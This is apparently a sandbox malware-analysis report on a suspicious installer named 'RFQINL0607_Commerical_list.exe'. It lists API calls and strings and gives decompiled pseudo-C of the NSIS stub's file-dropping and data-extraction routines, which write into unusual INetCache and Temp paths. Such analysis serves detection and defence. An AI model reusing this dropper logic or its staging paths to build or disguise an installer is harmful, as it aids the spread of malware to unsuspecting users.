                                                                                                                                                                                  0x00402e53
                                                                                                                                                                                  0x00402e5b
                                                                                                                                                                                  0x00402e60
                                                                                                                                                                                  0x00402e62
                                                                                                                                                                                  0x00402e62
                                                                                                                                                                                  0x00402e62
                                                                                                                                                                                  0x00402e6a
                                                                                                                                                                                  0x00402e6a
                                                                                                                                                                                  0x00402e6d
                                                                                                                                                                                  0x00402e6e
                                                                                                                                                                                  0x00402e6e
                                                                                                                                                                                  0x00402e71
                                                                                                                                                                                  0x00402e73
                                                                                                                                                                                  0x00402e73
                                                                                                                                                                                  0x00402e73
                                                                                                                                                                                  0x00402e7d
                                                                                                                                                                                  0x00402e83
                                                                                                                                                                                  0x00402e91
                                                                                                                                                                                  0x00402e96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402e96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402e3c
                                                                                                                                                                                  0x00402df6
                                                                                                                                                                                  0x00402e01
                                                                                                                                                                                  0x00402e06
                                                                                                                                                                                  0x00402e08
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402e0d
                                                                                                                                                                                  0x00402e10
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402cf4
                                                                                                                                                                                  0x00402cf9
                                                                                                                                                                                  0x00402cfe
                                                                                                                                                                                  0x00402d02
                                                                                                                                                                                  0x00402d09
                                                                                                                                                                                  0x00402d0e
                                                                                                                                                                                  0x00402d10
                                                                                                                                                                                  0x00402d12
                                                                                                                                                                                  0x00402d12
                                                                                                                                                                                  0x00402d16
                                                                                                                                                                                  0x00402d1b
                                                                                                                                                                                  0x00402d1d
                                                                                                                                                                                  0x00402e47
                                                                                                                                                                                  0x00402e3e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402e3e
                                                                                                                                                                                  0x00402d23
                                                                                                                                                                                  0x00402d2a
                                                                                                                                                                                  0x00402da6
                                                                                                                                                                                  0x00402daa
                                                                                                                                                                                  0x00402dae
                                                                                                                                                                                  0x00402db3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402daa
                                                                                                                                                                                  0x00402d33
                                                                                                                                                                                  0x00402d38
                                                                                                                                                                                  0x00402d3b
                                                                                                                                                                                  0x00402d40
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d42
                                                                                                                                                                                  0x00402d49
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d4b
                                                                                                                                                                                  0x00402d52
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d54
                                                                                                                                                                                  0x00402d5b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d5d
                                                                                                                                                                                  0x00402d64
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d66
                                                                                                                                                                                  0x00402d6c
                                                                                                                                                                                  0x00402d75
                                                                                                                                                                                  0x00402d7b
                                                                                                                                                                                  0x00402d7e
                                                                                                                                                                                  0x00402d80
                                                                                                                                                                                  0x00402d86
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402d8c
                                                                                                                                                                                  0x00402d90
                                                                                                                                                                                  0x00402d98
                                                                                                                                                                                  0x00402d98
                                                                                                                                                                                  0x00402d9b
                                                                                                                                                                                  0x00402d9b
                                                                                                                                                                                  0x00402d9e
                                                                                                                                                                                  0x00402da0
                                                                                                                                                                                  0x00402da2
                                                                                                                                                                                  0x00402da2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402da0
                                                                                                                                                                                  0x00402d92
                                                                                                                                                                                  0x00402d96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402db4
                                                                                                                                                                                  0x00402db4
                                                                                                                                                                                  0x00402dba
                                                                                                                                                                                  0x00402dc6
                                                                                                                                                                                  0x00402dc6
                                                                                                                                                                                  0x00402dc9
                                                                                                                                                                                  0x00402dcf
                                                                                                                                                                                  0x00402dd1
                                                                                                                                                                                  0x00402dd1
                                                                                                                                                                                  0x00402dd9
                                                                                                                                                                                  0x00402dd9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402dd9

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,00000400), ref: 00402C93
                                                                                                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe", xrefs: 00402C66
                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                                                                                                  • Null, xrefs: 00402D5D
                                                                                                                                                                                  • soft, xrefs: 00402D54
                                                                                                                                                                                  • C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                                                                                                  • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                  • Inst, xrefs: 00402D4B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                  • API String ID: 4283519449-559465314
                                                                                                                                                                                  • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                                                                                  • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 554 401751-401774 call 402a3a call 40580e 559 401776-40177c call 405d2f 554->559 560 40177e-401790 call 405d2f call 4057a1 lstrcatA 554->560 566 401795-40179b call 405f9a 559->566 560->566 570 4017a0-4017a4 566->570 571 4017a6-4017b0 call 406033 570->571 572 4017d7-4017da 570->572 580 4017c2-4017d4 571->580 581 4017b2-4017c0 CompareFileTime 571->581 574 4017e2-4017fe call 4059a2 572->574 575 4017dc-4017dd call 40597d 572->575 582 401800-401803 574->582 583 401876-40189f call 404f48 call 402e9f 574->583 575->574 580->572 581->580 584 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 582->584 585 401858-401862 call 404f48 582->585 597 4018a1-4018a5 583->597 598 4018a7-4018b3 SetFileTime 583->598 584->570 619 40184d-40184e 584->619 595 40186b-401871 585->595 599 4028d8 595->599 597->598 601 4018b9-4018c4 CloseHandle 597->601 598->601 603 4028da-4028de 599->603 604 4018ca-4018cd 601->604 605 4028cf-4028d2 601->605 607 4018e2-4018e5 call 405d51 604->607 608 4018cf-4018e0 call 405d51 lstrcatA 604->608 605->599 613 4018ea-402269 607->613 608->613 617 40226e-402273 613->617 618 402269 call 405525 613->618 617->603 618->617 619->595 620 401850-401851 619->620 620->585
                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A3A(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040580E(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057A1(E00405D2F(0x409410, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc\\Antioxidanttilskud\\Pellicularia\\Unillusioned")), ??);
				} else {
					_push(0x409410);
					E00405D2F();
				}
				E00405F9A(0x409410);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406033(0x409410);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040597D(0x409410);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059A2(0x409410, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F48(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42e488;
						goto L32;
					} else {
						E00405D2F(0x409c10, "7580360");
						E00405D2F("7580360", 0x409410);
						E00405D51(_t75, 0x409c10, 0x409410, "C:\Users\Arthur\AppData\Local\Temp\nsq51C5.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405D2F("7580360", 0x409c10);
						_t62 = E00405525("C:\Users\Arthur\AppData\Local\Temp\nsq51C5.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42e488 =  &( *0x42e488->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409410);
								_push(0xfffffffa);
								E00404F48();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F48(0xffffffea,  *(_t85 - 8)); // executed
				 *0x42e4b4 =  *0x42e4b4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E9F(); // executed
				 *0x42e4b4 =  *0x42e4b4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffee);
					} else {
						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffe9);
						lstrcatA(0x409410,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409410);
					E00405525();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                                                                                  0x00401751
                                                                                                                                                                                  0x00401758
                                                                                                                                                                                  0x00401761
                                                                                                                                                                                  0x00401764
                                                                                                                                                                                  0x00401767
                                                                                                                                                                                  0x0040176c
                                                                                                                                                                                  0x00401774
                                                                                                                                                                                  0x00401790
                                                                                                                                                                                  0x00401776
                                                                                                                                                                                  0x00401776
                                                                                                                                                                                  0x00401777
                                                                                                                                                                                  0x00401777
                                                                                                                                                                                  0x00401796
                                                                                                                                                                                  0x004017a0
                                                                                                                                                                                  0x004017a0
                                                                                                                                                                                  0x004017a4
                                                                                                                                                                                  0x004017a7
                                                                                                                                                                                  0x004017ac
                                                                                                                                                                                  0x004017ae
                                                                                                                                                                                  0x004017b0
                                                                                                                                                                                  0x004017b5
                                                                                                                                                                                  0x004017b5
                                                                                                                                                                                  0x004017c0
                                                                                                                                                                                  0x004017c0
                                                                                                                                                                                  0x004017d1
                                                                                                                                                                                  0x004017d3
                                                                                                                                                                                  0x004017d3
                                                                                                                                                                                  0x004017d4
                                                                                                                                                                                  0x004017d4
                                                                                                                                                                                  0x004017d7
                                                                                                                                                                                  0x004017da
                                                                                                                                                                                  0x004017dd
                                                                                                                                                                                  0x004017dd
                                                                                                                                                                                  0x004017e4
                                                                                                                                                                                  0x004017f3
                                                                                                                                                                                  0x004017f8
                                                                                                                                                                                  0x004017fb
                                                                                                                                                                                  0x004017fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00401800
                                                                                                                                                                                  0x00401803
                                                                                                                                                                                  0x0040185d
                                                                                                                                                                                  0x00401862
                                                                                                                                                                                  0x004015a8
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004028cf
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00401805
                                                                                                                                                                                  0x0040180b
                                                                                                                                                                                  0x00401816
                                                                                                                                                                                  0x00401823
                                                                                                                                                                                  0x0040182e
                                                                                                                                                                                  0x00401844
                                                                                                                                                                                  0x00401844
                                                                                                                                                                                  0x00401847
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040184d
                                                                                                                                                                                  0x0040184d
                                                                                                                                                                                  0x0040184e
                                                                                                                                                                                  0x0040186b
                                                                                                                                                                                  0x004028d8
                                                                                                                                                                                  0x004028d8
                                                                                                                                                                                  0x004028d8
                                                                                                                                                                                  0x00401850
                                                                                                                                                                                  0x00401850
                                                                                                                                                                                  0x00401851
                                                                                                                                                                                  0x00401492
                                                                                                                                                                                  0x0040226e
                                                                                                                                                                                  0x0040226e
                                                                                                                                                                                  0x0040226e
                                                                                                                                                                                  0x0040184e
                                                                                                                                                                                  0x00401847
                                                                                                                                                                                  0x004028da
                                                                                                                                                                                  0x004028de
                                                                                                                                                                                  0x004028de
                                                                                                                                                                                  0x0040187b
                                                                                                                                                                                  0x00401880
                                                                                                                                                                                  0x00401886
                                                                                                                                                                                  0x00401887
                                                                                                                                                                                  0x00401888
                                                                                                                                                                                  0x0040188b
                                                                                                                                                                                  0x0040188e
                                                                                                                                                                                  0x00401893
                                                                                                                                                                                  0x00401899
                                                                                                                                                                                  0x0040189d
                                                                                                                                                                                  0x0040189f
                                                                                                                                                                                  0x004018a7
                                                                                                                                                                                  0x004018b3
                                                                                                                                                                                  0x004018a1
                                                                                                                                                                                  0x004018a1
                                                                                                                                                                                  0x004018a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004018a5
                                                                                                                                                                                  0x004018bc
                                                                                                                                                                                  0x004018c2
                                                                                                                                                                                  0x004018c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004018ca
                                                                                                                                                                                  0x004018ca
                                                                                                                                                                                  0x004018cd
                                                                                                                                                                                  0x004018e5
                                                                                                                                                                                  0x004018cf
                                                                                                                                                                                  0x004018d2
                                                                                                                                                                                  0x004018db
                                                                                                                                                                                  0x004018db
                                                                                                                                                                                  0x004018ea
                                                                                                                                                                                  0x004018ef
                                                                                                                                                                                  0x00402269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402269
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Baptistisk Setup,NSIS Error), ref: 00405D3C
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0), ref: 00404FA4
                                                                                                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll), ref: 00404FB6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                  • String ID: 7580360$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned$C:\Users\user\AppData\Local\Temp\nsq51C5.tmp$C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll$Call
                                                                                                                                                                                  • API String ID: 1941528284-284672903
                                                                                                                                                                                  • Opcode ID: ff548947b34a87acadb8ae45a1ba2e016fc75a33f4cf65ac96e03cfcd735436c
                                                                                                                                                                                  • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff548947b34a87acadb8ae45a1ba2e016fc75a33f4cf65ac96e03cfcd735436c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 621 402e9f-402eb3 622 402eb5 621->622 623 402ebc-402ec5 621->623 622->623 624 402ec7 623->624 625 402ece-402ed3 623->625 624->625 626 402ee3-402ef0 call 4030b1 625->626 627 402ed5-402ede call 4030c7 625->627 631 402ef6-402efa 626->631 632 40309f 626->632 627->626 633 402f00-402f49 GetTickCount 631->633 634 40304a-40304c 631->634 635 4030a1-4030a2 632->635 638 4030a7 633->638 639 402f4f-402f57 633->639 636 40308c-40308f 634->636 637 40304e-403051 634->637 640 4030aa-4030ae 635->640 641 403091 636->641 642 403094-40309d call 4030b1 636->642 637->638 643 403053 637->643 638->640 644 402f59 639->644 645 402f5c-402f6a call 4030b1 639->645 641->642 642->632 654 4030a4 642->654 647 403056-40305c 643->647 644->645 645->632 653 402f70-402f79 645->653 650 403060-40306e call 4030b1 647->650 651 40305e 647->651 650->632 659 403070-403075 call 405a49 650->659 651->650 656 402f7f-402f9f call 4061ab 653->656 654->638 663 403042-403044 656->663 664 402fa5-402fb8 GetTickCount 656->664 662 40307a-40307c 659->662 665 403046-403048 662->665 666 40307e-403088 662->666 663->635 667 402fba-402fc2 664->667 668 402ffd-402fff 664->668 665->635 666->647 669 40308a 666->669 670 402fc4-402fc8 667->670 671 402fca-402ff5 MulDiv wsprintfA call 404f48 667->671 672 403001-403005 668->672 673 403036-40303a 668->673 669->638 670->668 670->671 679 402ffa 671->679 676 403007-40300e call 405a49 672->676 677 40301c-403027 672->677 673->639 674 403040 673->674 674->638 682 403013-403015 676->682 678 40302a-40302e 677->678 678->656 681 403034 678->681 679->668 681->638 682->665 683 403017-40301a 682->683 683->678
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E00402E9F(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x418420;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004030C7( *0x42e458 + _t62);
				}
				if(E004030B1( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004030B1(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004030B1(0x414420, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405A49(_a8, 0x414420, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ad84 =  *0x40ad84 & 0x00000000;
					 *0x40ad80 =  *0x40ad80 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40a868 = 8;
					 *0x414410 = 0x40c408;
					 *0x41440c = 0x40c408;
					 *0x414408 = 0x414408;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004030B1(0x414420, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40a858 = 0x414420;
						 *0x40a85c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40a860 = _t95;
							 *0x40a864 = _v12;
							_t75 = E004061AB(";]A");
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40a860; // 0x41b020
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42e4b4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
